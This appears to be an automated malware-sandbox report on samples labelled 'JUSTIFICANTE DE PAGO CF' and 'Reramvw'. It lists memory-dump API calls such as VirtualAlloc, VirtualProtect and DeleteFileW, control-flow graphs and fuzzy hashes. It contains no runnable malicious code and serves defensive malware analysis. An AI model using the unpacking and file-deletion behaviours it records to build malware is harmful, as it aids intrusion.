                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0641FEC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0641580F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0641580F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 02E072D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3212993954.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_2e00000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0641E0A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 02E072D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3212993954.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_2e00000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0642D6C2), ref: 0642D7AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254799140.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6420000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0642D6C2), ref: 0642D7AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254799140.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6420000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0641E0A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0641DBFC), ref: 0641DE36
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3211685000.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_13dd000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3211685000.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_13dd000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:10.8%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:38
                                                                                Total number of Limit Nodes:3
                                                                                execution_graph 7725 2a03ec0 7726 2a03ece 7725->7726 7727 2a03ed4 7726->7727 7733 2a04557 7726->7733 7737 2a0686f 7726->7737 7741 2a0455e 7726->7741 7744 2a06e0e 7726->7744 7747 2a04488 7726->7747 7734 2a0456a 7733->7734 7750 2a0bad0 7734->7750 7740 2a0bad0 VirtualProtect 7737->7740 7738 2a0688c 7739 2a045f1 7739->7737 7739->7738 7740->7739 7742 2a0459b 7741->7742 7743 2a0bad0 VirtualProtect 7741->7743 7743->7742 7746 2a0bad0 VirtualProtect 7744->7746 7745 2a06e29 7746->7745 7758 2a0c850 7747->7758 7752 2a0bae3 7750->7752 7754 2a0be98 7752->7754 7755 2a0bee0 VirtualProtect 7754->7755 7757 2a0459b 7755->7757 7761 2a0c878 7758->7761 7763 2a0c88b 7761->7763 7765 2a0c928 7763->7765 7766 2a0c968 VirtualAlloc 7765->7766 7768 2a044a8 7766->7768 7769 101d030 7770 101d048 7769->7770 7771 101d0a3 7770->7771 7773 2a0c2e0 7770->7773 7774 2a0c308 7773->7774 7777 2a0c610 7774->7777 7775 2a0c32f 7778 2a0c633 7777->7778 7779 2a0bad0 VirtualProtect 7778->7779 7781 2a0c6df 7778->7781 7780 2a0c6d3 7779->7780 7780->7775 7781->7775

                                                                                Control-flow Graph

                                                                                control_flow_graph 422 2a0be98-2a0bf19 VirtualProtect 425 2a0bf22-2a0bf47 422->425 426 2a0bf1b-2a0bf21 422->426 426->425
                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02A0BF0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2152760246.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2a00000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 1070 2a0c928-2a0c9a0 VirtualAlloc 1073 2a0c9a2-2a0c9a8 1070->1073 1074 2a0c9a9-2a0c9ce 1070->1074 1073->1074
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02A0C993
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2152760246.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2a00000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 1136 101d030-101d042 1137 101d0d3-101d0da 1136->1137 1138 101d048 1136->1138 1139 101d04a-101d056 1137->1139 1138->1139 1141 101d05c-101d07e 1139->1141 1142 101d0df-101d0e4 1139->1142 1143 101d080-101d09f call 2a0c2e0 1141->1143 1144 101d0e9-101d0fe 1141->1144 1142->1141 1146 101d0a3-101d0b3 1143->1146 1148 101d0b5-101d0bd 1144->1148 1146->1148 1149 101d10b 1146->1149 1150 101d100-101d109 1148->1150 1151 101d0bf-101d0d0 1148->1151 1150->1151
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2152329871.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_101d000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 1154 6c56b6d-6c56b80 1155 6c56bf6-6c56c8e 1154->1155 1156 6c56b82 1154->1156 1162 6c56c9a-6c56cb6 1155->1162 1156->1155 1165 6c50072-6c50078 1162->1165 1166 6c56cbc-6c56cbf 1162->1166 1167 6c50081-6c5dbaa 1165->1167 1168 6c5007a-6c57729 1165->1168 1166->1165 1168->1165 1175 6c5772f-6c57732 1168->1175 1175->1165
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2152329871.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_101d000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4e9781d9cbc9ea5d71c82079f79ba289413ec9db3bc996fa61a5642d61dde995
                                                                                • Instruction ID: afd6c504d4433d05feeb958fa2ae7254c0fc270793643621fcf1985edb147546
                                                                                • Opcode Fuzzy Hash: 4e9781d9cbc9ea5d71c82079f79ba289413ec9db3bc996fa61a5642d61dde995
                                                                                • Instruction Fuzzy Hash: 26F0E234A0114A8FF752EF58D8557D97BA2FF96310F0000EAC90E9B395EB341A82CB42
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fdb1b73aae527c193063ae6327f4a9841d3573d7da010788f3c8d1e232db19ef
                                                                                • Instruction ID: 5723c8bc376d61f29b0a7c452154e2c81df3028ca3537d3c4678c05ad48539bb
                                                                                • Opcode Fuzzy Hash: fdb1b73aae527c193063ae6327f4a9841d3573d7da010788f3c8d1e232db19ef
                                                                                • Instruction Fuzzy Hash: 9C019274A442198FD765DF18D844A99B7B2FB58301F1081E6D589E7394DF345E808FA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 73d5522ec01ca86199122d078f5e268117dbc158b726afb2ca388ce17f2c8cdc
                                                                                • Instruction ID: 74aa8bb443d5e4ce74a6a88bc02c52f5231197d7c816c92bb738bb70771f9f3d
                                                                                • Opcode Fuzzy Hash: 73d5522ec01ca86199122d078f5e268117dbc158b726afb2ca388ce17f2c8cdc
                                                                                • Instruction Fuzzy Hash: C0F03774A401188FEB55EF58C855A9DB7B2FB58300F1140E5D549AB394CB346E81CF10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8c1f08f2a56d2f349dd39950b62be42b054ce1e9d91170691d376fe720867183
                                                                                • Instruction ID: 2a599cb60839029e9e44694d3f652ad60dddafc3a06bb59759d4a5630e2d2df4
                                                                                • Opcode Fuzzy Hash: 8c1f08f2a56d2f349dd39950b62be42b054ce1e9d91170691d376fe720867183
                                                                                • Instruction Fuzzy Hash: F3F03070A041588FD794EF58D8806997BE1BB9D310F1241A5C949E7244D7349D418F99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ae08729cdf4387d9d7c3aed5e9dd95911d7143dcb1c9bb23a8ff31982dc86c6a
                                                                                • Instruction ID: 089716e36f37fe14b9d8fbefc2a7f298a4e9d33431337efe8f5076dec851bfc7
                                                                                • Opcode Fuzzy Hash: ae08729cdf4387d9d7c3aed5e9dd95911d7143dcb1c9bb23a8ff31982dc86c6a
                                                                                • Instruction Fuzzy Hash: F8F058B8A01014CFEB15DF08C840AA9B7B2FB98301F1081D9DA49EB398CA34AD418F61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 64bdeeee7bdb3c7995d76df752517cc581b84489c0d45b4c87883769123d73e2
                                                                                • Instruction ID: 466f9f7b2b2a795293936ebfec21e35edfefaf6f751e58d7300e68c5a7ab4b9f
                                                                                • Opcode Fuzzy Hash: 64bdeeee7bdb3c7995d76df752517cc581b84489c0d45b4c87883769123d73e2
                                                                                • Instruction Fuzzy Hash: F3D0A934A44201AFE3908A98D884AC637A0E718330F054222A90AB3281EAAC4C828BA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                                • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:11.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:152
                                                                                Total number of Limit Nodes:20

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2342518720.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5fd0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: fa9479c77c21d5c1f049956ccfe474888dd37a170a91c39db162420e61b93d81
                                                                                • Instruction ID: c2a0f07f6ff01b0f2887e1f46a04976b9dfd466d0b11e89534ec75daf827e0c2
                                                                                • Opcode Fuzzy Hash: fa9479c77c21d5c1f049956ccfe474888dd37a170a91c39db162420e61b93d81
                                                                                • Instruction Fuzzy Hash: 16812570A00B458FDB24DF29D444B6AFBF6FF88300F048929D446D7A50D779E945CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05FDFEC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2342518720.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5fd0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: d72b387a56c8046f64d66fbb6ff12f116ffbc27eb2691af1ee5ac7c8523ba494
                                                                                • Instruction ID: b1e162a0b783622eb895bf2a610314316597981a324087c1e3c270265cdc1ac1
                                                                                • Opcode Fuzzy Hash: d72b387a56c8046f64d66fbb6ff12f116ffbc27eb2691af1ee5ac7c8523ba494
                                                                                • Instruction Fuzzy Hash: 7051E1B1C00249AFDF15CF99C884ADEBFB6FF49300F14812AE819AB221D7759945CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2343876651.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6890000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7a3c17c122951a91bb2d7fd204d4a51460014880d0a08cd0f791e32c2533d6ed
                                                                                • Instruction ID: 986996ee027b1956ef669e7bd67bfad78da48f27193f58abd247457a70b06027
                                                                                • Opcode Fuzzy Hash: 7a3c17c122951a91bb2d7fd204d4a51460014880d0a08cd0f791e32c2533d6ed
                                                                                • Instruction Fuzzy Hash: EA412571D047999FCB00DFA9D8002AEBBF1BF89310F18896AD908E7251DB789845CBE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05FDFEC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2342518720.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5fd0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 00f6435c2a30e93824f3459cabc16fb82609a280f1dd7118148a7ec039b22d2a
                                                                                • Instruction ID: b7d91d444e519f9ae1709b2c6be650a9a6cc071f2aed93920cbec362666f1be6
                                                                                • Opcode Fuzzy Hash: 00f6435c2a30e93824f3459cabc16fb82609a280f1dd7118148a7ec039b22d2a
                                                                                • Instruction Fuzzy Hash: 9F51D3B1D003499FDB14CF99C884ADEFBB6FF48310F24812AE419AB250D7759945CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05FDFEC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2342518720.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5fd0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: b8a78dd06359582220f34679b652ea7b8a08a4c19daff9ef3ab659f5dc19ee20
                                                                                • Instruction ID: 3a6fb9f91778152a616a69ddba271f8ab42864aeb7c2d7c4a5de9b093c5af354
                                                                                • Opcode Fuzzy Hash: b8a78dd06359582220f34679b652ea7b8a08a4c19daff9ef3ab659f5dc19ee20
                                                                                • Instruction Fuzzy Hash: B741B2B1D003499FDB14CF99C884ADEFBB6FF48310F24852AE419AB250D7759945CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 018D72D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2330970059.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_18d0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 05FDE0A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2342518720.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5fd0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 018D72D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2330970059.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_18d0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0689D6BA), ref: 0689D7A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2343876651.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6890000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0689D6BA), ref: 0689D7A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2343876651.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6890000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 05FDE0A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2342518720.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5fd0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,05FDDBFC), ref: 05FDDE36
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2342518720.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5fd0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2328950507.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_183d000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2328950507.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
